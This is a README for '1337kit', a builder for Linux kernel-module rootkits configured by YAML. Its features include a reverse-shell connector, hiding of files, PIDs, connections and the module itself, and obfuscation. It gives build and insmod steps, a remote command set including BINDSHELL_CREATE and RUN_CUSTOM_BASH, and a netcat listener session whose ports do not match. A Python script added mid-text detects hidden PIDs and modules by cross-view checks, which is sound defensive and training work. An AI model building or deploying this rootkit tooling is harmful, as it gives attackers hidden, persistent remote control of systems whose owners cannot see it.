1337kit is a 64-bit LKM rootkit builder based on a YAML prescription.
Fully tested on: Linux 5.11.0-34-generic 20.04.1-Ubuntu x86_64 x86_64 x86_64 GNU/Linux
This project is for malware analysts and for creators of CTF or cyber-security exercises; with this builder you can build a custom rootkit for your exercise.
I do not take any responsibility for usage of this project.
- RevShell based connector
- Hiding dents (files, file-name prefixes, process IDs)
- Hiding connections based on Ports in TCP Connection (IPv4 and IPv6)
- Hiding connections based on IP in TCP Connection (IPv4)
- Hiding connections based on Ports in UDP Connection (IPv4 and IPv6)
- Hiding connections based on IP in UDP Connection (IPv4)
- Spawning scripts to user-space
- Hiding module from module list
- Files and functions obfuscation
- Strings encryption
- Verbose building
Builder requirements:
```
$ pip3 install -r requirements.txt
```
Install the requirements for building the LKM:
```
$ sudo apt-get install build-essential linux-headers-$(uname -r)
```
You have to create your own YAML prescription for the custom rootkit. Example of a full prescription (every option can be omitted):
```yaml
hideme: true
connector:
  ip: "127.0.0.1"
  port: "8080"
hide_dent: # Here you can put all the files, directories and process IDs you want to hide from the user
  - "91746"
  - "1337test_"
hide_tcp_port:
  - "8080"
  - "1337"
hide_tcp_ip:
  - "127.0.0.1"
  - "8.8.8.8"
hide_udp_port:
  - "8080"
  - "1337"
hide_udp_ip:
  - "127.0.0.1"
  - "8.8.8.8"
shells:
  - "sleep 1000"
```
After you create your YAML, just run builder.py:
```
$ python3 builder.py --help
usage: builder.py [-h] -c CONFIG [-v] [-o] [-s]

Generate rootkit from yaml prescription

optional arguments:
  -h, --help            show this help message and exit
  -c CONFIG, --config CONFIG
                        Yaml prescription file
  -v, --verbose         Debug Mode
  -o, --obfuscate_files
                        Enable rootkit symbols obfuscation
  -s, --obfuscate_strings
                        Enable rootkit strings obfuscation
```
and the rootkit will be created.
Another way to execute your hiding or shell script is the connector. If you enable the connector, a reverse-shell connection is created to your defined IP and port; after this it will try to open the connection every x seconds. Once the connection is open, multiple commands can be sent:
- HIDEME
- SHOWME
- HIDE_DENT
- SHOW_HIDDEN_DENT
- HIDE_TCP_PORT
- SHOW_HIDDEN_TCP_PORT
- HIDE_TCP_IP
- SHOW_HIDDEN_TCP_IP
- HIDE_UDP_PORT
- SHOW_HIDDEN_UDP_PORT
- HIDE_UDP_IP
- SHOW_HIDDEN_UDP_IP
- BINDSHELL_CREATE
- RUN_CUSTOM_BASH
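For the defending side of such an exercise, the hiding features above (hide_dent / HIDE_DENT for process IDs, hideme / HIDEME for the module) are usually caught with a cross-view check: the same information is read through two kernel paths, and an entry that appears in one view but not the other is flagged. The script below is an added example, not part of 1337kit or its builder. It compares the PIDs that readdir() of /proc returns with the PIDs found by a direct stat() of each /proc/<pid>, and compares /proc/modules with the loadable modules still present under /sys/module. The paths, the `initstate` heuristic for telling loadable modules from built-in ones, and the sample values used in the test are assumptions of this example; the module name `project` matches the `project.ko` the README builds.

```python
import os

# Paths assumed by this example (standard procfs/sysfs locations).
PROC = "/proc"
SYS_MODULE = "/sys/module"


def listed_pids(proc_root=PROC):
    """PIDs visible through readdir() of /proc.

    This is the view `ps` and `ls /proc` get, and it is exactly the view a
    getdents/iterate_shared hook can filter, so a hidden PID is absent here.
    """
    return {int(name) for name in os.listdir(proc_root) if name.isdigit()}


def probed_pids(max_pid, proc_root=PROC):
    """PIDs that answer to a direct stat() of /proc/<pid>.

    A lookup by name never walks the directory listing, so a hook that only
    filters directory entries does not affect it.  Scanning up to pid_max
    (4194304 on most systems) takes a few seconds; that is intended.
    """
    found = set()
    for pid in range(1, max_pid + 1):
        try:
            os.stat(os.path.join(proc_root, str(pid)))
        except FileNotFoundError:
            continue
        except PermissionError:
            pass  # entry exists, we merely cannot inspect it
        found.add(pid)
    return found


def hidden_pids(listed, probed):
    """Pure set comparison so it can be tested on constructed input."""
    return sorted(probed - listed)


def parse_proc_modules(text):
    """Module names from /proc/modules text (name is the first field per line)."""
    return {line.split()[0] for line in text.splitlines() if line.strip()}


def loadable_modules_in_sysfs(sys_module=SYS_MODULE):
    """Loaded LKMs keep /sys/module/<name>/initstate even after unlinking
    themselves from the in-kernel module list; built-in modules have no
    initstate file, so they are skipped to avoid false positives.  This is a
    heuristic: a rootkit that also removes its sysfs kobject evades it.
    """
    return {
        name
        for name in os.listdir(sys_module)
        if os.path.exists(os.path.join(sys_module, name, "initstate"))
    }


def hidden_modules(proc_names, sysfs_names):
    """Loadable modules present in sysfs but missing from /proc/modules."""
    return sorted(sysfs_names - proc_names)


def read_max_pid(path="/proc/sys/kernel/pid_max"):
    with open(path) as f:
        return int(f.read())


if __name__ == "__main__":
    # Probe first, then list: a process that exits between the two steps would
    # be in `probed` but not `listed`, so each candidate is re-checked with a
    # second stat() before it is reported.
    probed = probed_pids(read_max_pid())
    listed = listed_pids()
    confirmed = [
        pid for pid in hidden_pids(listed, probed)
        if os.path.exists(os.path.join(PROC, str(pid)))
    ]
    print("PIDs present but missing from /proc listing:", confirmed)

    with open("/proc/modules") as f:
        proc_names = parse_proc_modules(f.read())
    print("modules in sysfs but missing from /proc/modules:",
          hidden_modules(proc_names, loadable_modules_in_sysfs()))
```

Run it as root on the exercise host after loading the module to confirm the hiding works and, more usefully, to show participants what a cross-view check looks like. The same idea extends to the connection-hiding features: /proc/net/tcp, which the hooked seq_show functions filter, can be compared against a socket dump obtained over a different kernel interface such as netlink sock_diag (what `ss` uses), which these hooks do not touch.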
The tcp_seq_show.c file in hooker is pretty much the same as udp_seq_show.c, but I split it in case anyone needs their own modification for either of the protocols.
- TCP and UDP IPv6 hiding
- AES Encryption support
```
$ python3 builder.py --config testfiles/config.yml
$ sudo insmod project.ko
$ nc -lvnp 1337
Listening on 0.0.0.0 8080
Connection received on 127.0.0.1 39040
RUN_CUSTOM_BASH sleep 1000
```